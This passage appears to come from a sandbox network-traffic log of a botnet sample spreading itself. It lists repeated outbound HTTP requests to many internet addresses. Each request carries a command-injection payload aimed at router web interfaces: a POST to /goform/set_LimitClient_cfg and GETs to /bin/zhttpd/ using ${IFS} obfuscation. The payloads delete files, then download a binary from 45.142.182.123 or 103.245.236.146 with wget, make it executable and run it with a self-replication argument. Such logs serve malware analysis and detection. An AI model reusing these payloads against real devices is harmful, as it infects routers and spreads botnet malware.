                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:45.994129896 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:49.097656012 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:55.240842104 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2969192.168.2.234879092.125.141.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.210221052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2970192.168.2.234546647.47.188.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.210258961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2971192.168.2.2341792205.200.242.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.210284948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2972192.168.2.236020693.61.132.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.210326910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2973192.168.2.234491858.180.6.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.210359097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2974192.168.2.2353820135.211.34.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.210398912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2975192.168.2.234043893.178.220.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.210441113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2976192.168.2.2346312211.29.114.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.210597038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2977192.168.2.2346084148.216.252.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.210628986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2978192.168.2.233481825.79.14.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.210664988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2979192.168.2.234773212.24.15.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.210704088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2980192.168.2.234723817.65.84.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.210746050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2981192.168.2.2350370148.62.233.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.210791111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2982192.168.2.2351086181.19.57.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.210849047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2983192.168.2.234989495.72.174.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.210886955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2984192.168.2.2347290210.58.102.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.210952044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2985192.168.2.2345668191.240.134.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.210982084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2986192.168.2.233432213.225.146.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211018085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2987192.168.2.2353080146.193.175.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211071014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2988192.168.2.234143468.225.207.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211119890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2989192.168.2.2343448131.36.26.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211158991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2990192.168.2.235667660.149.58.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211196899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2991192.168.2.2359714126.87.20.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211250067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2992192.168.2.2360480155.172.154.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211283922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2993192.168.2.234603088.36.147.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211322069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2994192.168.2.2346800140.208.45.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211349964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2995192.168.2.236031417.139.218.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211395025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2996192.168.2.235272080.63.107.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211429119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2997192.168.2.2346788168.149.221.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211464882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2998192.168.2.23597862.153.170.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211500883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2999192.168.2.2336382113.107.169.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211539030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3000192.168.2.2358644162.253.52.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211560011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3001192.168.2.2348850155.94.184.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211597919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3002192.168.2.235262488.42.83.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211652994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3003192.168.2.233826848.247.212.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211674929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3004192.168.2.2349244126.234.27.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211735010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3005192.168.2.23404788.141.115.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211765051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3006192.168.2.2343308120.216.111.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211802006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3007192.168.2.2354660126.249.42.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211852074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3008192.168.2.235323453.156.222.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211882114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3009192.168.2.2341102164.24.187.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211930037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3010192.168.2.2340480111.103.244.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.211970091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3011192.168.2.2347106176.215.212.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212002993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3012192.168.2.2334882203.16.227.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212053061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3013192.168.2.234122687.69.176.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212096930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3014192.168.2.2337924199.163.11.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212136030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3015192.168.2.2355770132.70.119.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212168932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3016192.168.2.235251048.231.125.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212191105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3017192.168.2.2356294115.50.117.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212246895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3018192.168.2.234572212.183.237.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212279081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3019192.168.2.2342904186.233.49.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212304115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3020192.168.2.2359196213.140.176.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212340117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3021192.168.2.2344012118.202.88.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212357998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3022192.168.2.236098019.12.15.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:43.212405920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3023192.168.2.235063436.34.146.40443
                                                TimestampBytes transferredDirectionData
